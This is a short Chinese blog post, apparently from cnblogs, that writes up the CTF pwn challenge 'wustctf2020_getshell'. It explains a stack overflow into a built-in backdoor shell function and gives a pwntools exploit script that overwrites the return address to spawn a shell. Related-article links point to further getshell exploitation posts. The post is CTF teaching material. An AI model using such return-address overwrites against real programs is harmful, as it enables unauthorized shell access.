首页 > 系统相关 >wustctf2020_getshell

wustctf2020_getshell

时间:2023-12-31 22:15:03浏览次数:34  
标签:getshell shell wustctf2020 elf io payload

wustctf2020_getshell

image-20231231142431436

  • ret2shell
  1. vulnerable函数中存在溢出漏洞
  2. shell函数中已经预留了后门

溢出->跳转到后门函数

from pwn import *
context.log_level = 'debug'
elf=ELF('wustctf2020_getshell')
io = process('wustctf2020_getshell')
payload = b'A'*(0x18+0x4)+p32(elf.sym['shell'])
io.sendline(payload)
io.interactive()

标签:getshell,shell,wustctf2020,elf,io,payload
From: https://www.cnblogs.com/bamuwe/p/17937485

相关文章

  • 通达OA 任意文件上传+文件包含 getshell
    漏洞影响版本通达OAV11版<=11.320200103通达OA2017版<=10.1920190522通达OA2016版<=9.1320170710通达OA2015版<=8.1520160722通达OA2013增强版<=7.2520141211通达OA2013版<=6.2020141017漏洞分析根据网上的文章可以知道任意文件上传的漏洞点在is......
  • Mysql慢日志getshell
    Mysql慢日志getshellshowvariableslike'%slow%';Variable_nameValuelog_slow_queriesOFFslow_launch_time2slow_query_logOFFslow_query_log_fileC:\phpStudy\PHPTutorial\MySQL\data\WIN-374NAWYudt-slow.logsetGLOBALsl......
  • [WUSTCTF2020]girlfriend
    下载了一个音频文件,打开来听起来像是在打电话输入号码的声音,猜测DTMF拨号音识别,有个程序可以识别一下dtmf2num.exe,通过链接可以下载http://aluigi.altervista.org/mytoolz/dtmf2num.zipDTMF2NUM0.2byLuigiAuriemmae-mail:[email protected]:aluigi.org-open......
  • [WUSTCTF2020]alison_likes_jojo
    boki图片中有隐藏文件压缩包需要密码暴力破解出密码888866解压得到信息经过三次base64解码后得到信息得到密码,这是另一张图片outguess隐写的密码,之后到虚拟机中进行破解得到flagflag{pretty_girl_alison_likes_jojo}......
  • 记一次任意文件下载到Getshell
    任意文件下载(ArbitraryFileDownload)是一种常见的Web攻击技术,用于窃取服务器上任意文件的内容。攻击者利用应用程序中的漏洞,通过构造恶意请求,使应用程序将任意文件(如配置文件、敏感数据等)发送给攻击者。一旦攻击者成功利用这种漏洞,就可以从服务器上获取应用程序所拥有的任意文......
  • [WUSTCTF2020]朴实无华 1
    原理intval绕过MD5加密值和原值相等绕过命令执行空格过滤解题过程intval($num)<2020&&intval($num+1)>2021绕过:https://blog.csdn.net/qq_47804678/article/details/128814377参考文章:https://blog.csdn.net/m0_62879498/article/details/124632041......
  • Tomcat7+ 弱口令 && 后台getshell漏洞
    目录Tomcat7+弱口令&&后台getshell漏洞1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证Tomcat7+弱口令&&后台getshell漏洞说明内容漏洞编号漏洞名称Tomcat7+弱口令&&后台getshell漏洞漏洞评级高危影响范......
  • Tomcat7+ 弱口令 && 后台getshell漏洞
    Tomcat7+弱口令&&后台getshell漏洞环境说明Tomcat支持后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。Tomcat7+权限分为:manger(后台管理)manger-gui拥有html页面权限manger-status拥有查看status的权限mager-jmx拥有jmx权限......
  • buuctf-[WUSTCTF2020]朴实无华
    打开靶机显示  啥都没有,先去查看robots.txt 发现  之后再fake里面请求头中发现fl4g.php  最后绕过三层php限制  第一关intvar 可以解析科学计数法 所以传入 1e4第一个截断解析为1  第二个加一解析为10001 payload:num=1e4第二关只要是0e开头md5......
  • 从密码重置打到Getshell和其它漏洞打包
    前言前几天是准备上点edusrc的分的所以就准备用手上还没刷的Nday继续上分,然后就有了今天这个案例:信息收集之前在挖某体育学院证书的时候就挖到过一个通过修改html文件更改密码修改步骤的漏洞所以就准备测绘一下这个资产继续看看能不能上分挑一个打开:没有背景图了但还是......